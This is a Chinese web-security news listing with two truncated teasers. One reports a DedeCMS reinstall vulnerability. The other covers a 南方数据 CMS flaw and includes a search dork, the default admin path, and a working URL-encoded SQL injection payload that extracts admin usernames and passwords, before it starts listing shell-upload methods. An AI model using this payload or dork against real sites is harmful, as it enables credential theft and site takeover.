-
织梦CMS出现漏洞 或导致网站被脱裤,挂马!
站长之家(Chinaz.com)6月3日消息。 近日,网络安全社区t00ls论坛上名为“冰封”的漏洞研究者发现并公布的DedeCMS漏洞。称“黑客”可通过这一漏洞控制入侵网站,最终导致网站被“脱裤”、“挂马”、“非法seo”等危害。 此漏洞与SCANV网站安全中心研究员于5月2日独立发现并报告给DedeCMS官方的”DedeCMS重安装”漏洞为同一漏洞。而SCANV网站安全中心表示多次与官方联系,但...阅读全文阅读全文
-
南方数据网站漏洞
漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20”=’ 拿shell方法貌似有4种: 1、注册用户上传拿shell,这...阅读全文